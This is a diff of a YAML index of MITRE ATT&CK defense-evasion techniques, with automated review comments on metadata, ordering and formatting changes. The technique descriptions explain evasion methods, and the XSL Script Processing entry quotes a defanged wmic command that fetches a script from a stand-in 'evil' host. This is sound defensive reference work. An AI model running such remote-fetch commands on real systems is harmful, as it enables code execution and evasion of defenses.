source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -14499,13 +14818,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -14602,7 +14919,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -14665,7 +14981,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests:
- name: Binary simply packed by UPX
@@ -14745,7 +15060,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -14772,8 +15087,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -14801,7 +15114,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -14845,8 +15158,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -14901,7 +15212,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -14921,7 +15232,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
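Review bot: this hunk removes `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 2.1.0` for T1622, whereas the T1564.005 and T1055.005 hunks above remove both fields. Confirm the generator is intentionally preserving `x_mitre_attack_spec_version` wherever upstream provides it; if that is the rule, the entries where it disappears entirely are losing a real upstream field and should be checked against the source bundle.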
@@ -14971,7 +15281,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests:
- name: Space After Filename (Manual)
@@ -15056,12 +15365,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -15111,12 +15419,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -15176,8 +15483,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -15194,37 +15501,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
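Review bot: the rewritten T1548.006 description switches to the `|+` block scalar (`description: |+`) and is followed by an empty line before `kill_chain_phases`, so the value keeps that blank line and ends in two newlines. Every other block description in this file uses `|-` (for example `description: |-` on T1574.002 and T1220), which strips trailing newlines. If `|+` is the dumper's faithful rendering of an upstream string ending in `\n\n`, that is acceptable but worth a mention, since the only difference from the previous `...permissions.\n` ending is the extra newline; otherwise prefer `|-` for consistency. Separately, the new sentence "and an overwrites file (if connected to an MDM)" reads awkwardly; it should not be edited locally if it matches the current upstream text, but confirm it is not a transcription slip.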
@@ -15232,6 +15520,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -15239,7 +15529,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -15269,7 +15559,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -15315,7 +15604,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -15360,8 +15649,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -15406,7 +15693,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -15420,58 +15707,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
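Review bot: the description in this hunk adds `(Citation: Hexacorn Listplanting)` while the same hunk deletes the entire `external_references` block for T1055.015, so within this hunk the new citation has no matching source. The block is restored further down the entry, with the Hexacorn source added, as part of the key reordering, so the final YAML is consistent, but the reordering turns a small content change (one new citation, a new `modified`, `x_mitre_version` 1.0 to 1.1) into a roughly ninety-line rewrite. If the generator's key order is now stable, a separate mechanical reorder commit first would let the content changes to T1055.015, T1220 and T1578.001 be reviewed on their own.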
@@ -15488,6 +15745,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -15502,21 +15762,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -15561,9 +15852,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
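Review bot: the T1484 platform list loses `Azure AD` and `SaaS` and gains `Identity Provider`, with `x_mitre_version` moving 3.0 to 3.1. Dropping `SaaS` is a real scope change, not just a rename of `Azure AD`, so anything in the repository that filters techniques by `x_mitre_platforms` (per-platform indexes in particular) must be regenerated in the same change, and the commit message should say this follows the upstream platform consolidation rather than a local decision.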
@@ -15620,8 +15910,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -15630,57 +15920,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
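Review bot: the `Microsoft XSLT Script Mar 2017` reference description still reads "XSLT Stylesheet Scripting Using ." with the element name missing before the period; it is deleted here and re-added unchanged further down, so the regeneration did not correct it. Presumably the upstream title contains the element name in angle brackets and an HTML-stripping step in the generator is eating it; the stray line breaks around `SysListView32` in the T1055.015 description and around `IsDebuggerPresent()` in T1622 look like the same markup loss. Worth checking once in the generator rather than patching entries by hand.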
@@ -15698,29 +15942,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
@@ -15753,7 +16041,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -15781,8 +16069,6 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
@@ -15863,42 +16149,7 @@ defense-evasion:
name: sh
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
